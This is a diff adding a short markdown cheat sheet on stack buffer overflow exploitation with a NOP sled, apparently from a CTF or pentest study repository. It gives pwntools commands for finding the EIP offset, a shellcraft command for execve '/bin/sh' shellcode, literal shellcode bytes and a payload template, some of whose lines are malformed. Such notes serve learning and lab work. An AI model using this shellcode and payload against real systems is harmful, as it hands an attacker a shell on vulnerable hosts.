BO addition

exploit/buffer_overflow/docs/cut_stack_in_half.md

@@ -0,0 +1,32 @@
+# Cut Stack in Half + NOPsled
+
+* Stack has to be executable
+* `cylic buffer` + `eip` content is `esp` + half of the stack + NOPsled + shellcode
+* **ASLR has to be off** or `eip` content address pointing into the sled needs to be fuzzed hard
+
+## shellcraft
+* for example
+```sh
+shellcraft i386.linux.execve "/bin///sh" "['sh', '-p']" -f s
+```
+
+##  Usage
+* measure `eip` offset via 
+    ```sh
+    cyclic <number>
+    ```
+    * Check eip content via gdb
+    ```sh
+    cyclic -l <eipContent>
+    ```
+* Example code
+```python
+from pwn import *
+
+padding(cyclic(cyclic_find(<eipContent>))
+eip = p32(<esp> + some offset into stack)
+sled = 90 * 100
+shellcode = "jhh\x2f\x2f\x2fsh\x2fbin\x89\xe3jph\x01\x01\x01\x01\x814\x24ri\x01,1\xc9Qj\x07Y\x01\xe1Qj\x08Y\x01\xe1Q\x89\xe11\xd2j\x0bX\xcd\x80"
+payload = padding + eip + sled + shellcode
+```
+